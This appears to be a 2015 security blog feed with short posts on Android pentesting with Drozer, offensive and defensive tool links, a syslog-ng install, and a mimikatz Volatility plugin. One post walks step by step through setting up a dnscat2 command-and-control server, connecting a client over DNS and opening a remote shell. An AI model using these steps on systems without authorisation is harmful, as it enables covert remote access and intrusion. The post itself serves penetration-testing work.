Jul 10, 2015

Howto: Mobile penetration testing on Android using Drozer

Mobile phones have become an indispensable part of our daily life. We use mobile phones to communicate with our loved ones, for quick access to information through the Internet, to make transactions through mobile banking apps or to relax reading a good book. In a way, a big part of our private life has moved into the digital environment. Mobile phones seem to be a pocket-sized treasure of secrets and information, hiding our most valuable photos, mails, contacts and even banking information. There’s no wonder why we need mobile phones to have bullet-proof security.
Android is the most common operating system for mobile devices and is particularly interesting from the security point of view.  It is very permissive, allowing its users to customize about anything, administrative privileges (a.k.a. rooting) can be unlocked on most phones, it has a very fuzzy system for the permissions required by applications and it features different ways for one application to interact with other applications.

Source::  http://securitycafe.ro/2015/07/08/mobile-penetration-testing-using-drozer/

Howto: Use dnscat2 for connect c&c server

Server side
1. download dnscat2 from https://github.com/iagox86/dnscat2
# git clone https://github.com/iagox86/dnscat2

2. Install dnscat2
# cd dnscat2/server
# apt-get install ruby-dev build-essential
# gem install bundler
# gem install eventmachine -v '1.0.3'
# bundler install

3.  Start server
# ruby dnscat2 <domain>
# ruby dnscat2

Client side
4. Download dnscat2 from https://github.com/iagox86/dnscat2
# git clone https://github.com/iagox86/dnscat2

5. Compile client
# cd dnscat2/client
# make

6. Connect to dnscat2 server
# dnscat --host <domain>
# dnscat --host <IP>

Server side
7. list the sessions using
# dnscat2> sessions

8. Interact with session with
# dnscat2> session -i <session_id>
# dnscat2> session -i 51336

9. Create a shell
# dnscat2> shell
# dnscat2> sessions
# dnscat2> session -i <id>

Tools: Teampass - Collaborative Passwords Manager

Teampass is a Collaborative Passwords Manager

Source:: https://github.com/nilsteampassnet/TeamPass

Jul 9, 2015

Tools: theWind - MITM Tool

a MITM attack tool
Aims to do man in the middle attacks on multiple application layer protocols. for now, it only supports SSL protocol.
 Source:: https://github.com/liuhui0613/TheWind

Tools: Hacking-Team-Sweeper - Tools to help detect Hacking Team malware

Hacking Team has developed a large amount of malware that is being used to target activists around the world. A hacker has recently released a 400+ GB data dump of internal HackingTeam source code. Currently there is a possibility that HT clients are attempting to wipe traces off their victim's computers. We need your aid to help perserve evidence. If you have technical skills we urge to contribute, time is of the essence.

Source:: https://github.com/0xPoly/Hacking-Team-Sweeper

Tools: ADB Backup APK Injection

The Android operating system offers a backup/restore mechanism of installed packages through the ADB utility. By default, full backup of applications including the private files stored in /data is performed, but this behaviour can be customized by implementing a BackupAgent class. This way applications can feed the backup process with custom files and data. The backup file created is a simple compressed tar archive with some Android specific headers. Optional encryption is also possible.

Source:: https://github.com/irsl/ADB-Backup-APK-Injection/

Tools: Johny - John the Ripper GUI

Johnny is a cross-platform open-source GUI for the popular password cracker John the Ripper. It was proposed by Shinnok.

Source:: http://openwall.info/wiki/john/johnny

Jul 8, 2015

Howto: Install syslog-ng in Ubuntu 14.04

1.  Install required software and export PKG_CONFIG_PATH
# apt-get install pkg-config libperl-dev libgtk2.0-dev
# export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/lib/pkgconfig

2. Download source of eventlog
# wget "https://my.balabit.com/downloads/eventlog/0.2/eventlog_0.2.12.tar.gz"
# tar xzvf eventlog_0.2.9.tar.gz
# ./configure && make && make install
3. Download Source of syslog-ng
# wget "http://my.balabit.com/downloads/syslog-ng/open-source-edition/3.6.4/source/syslog-ng_3.6.4.tar.gz"
# tar xzvf syslog-ng_3.6.4.tar.gz
# ./configure && make && make install

4. Startup script (Must change path of syslog-ng in syslog-ng.init)
# cp debian/syslog-ng.init /etc/init.d/syslog-ng
# chmod +x /etc/init.d/syslog-ng

5. Reload list of library
# ldconfig -v

6. Try to use syslog-ng
# /etc/init.d/syslog-ng start

Jul 7, 2015

VDO: Demo MS09-001 that leaked from HackingTeam

Source:: http://sprunge.us/dSDQ

Howto: install mimikatz into Volatility plugin

1. Download mimikatz
# wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py

2. Copy to volatility plugin folder
# cp mimikatz.py /usr/share/pyshared/volatility/plugins/
# cp /usr/lib/python2.7/dist-packages/volatility/plugins/

3. Try to use it
# Volatility -f <file_name>.vmem  –profile=<Known_Profile_of_Image> mimikatz

Tools: Sentry - Bruteforce attack blocker (ssh, FTP, SMTP, and more)

sentry - safe and effective protection against bruteforce attacks

Source:: https://github.com/msimerson/sentry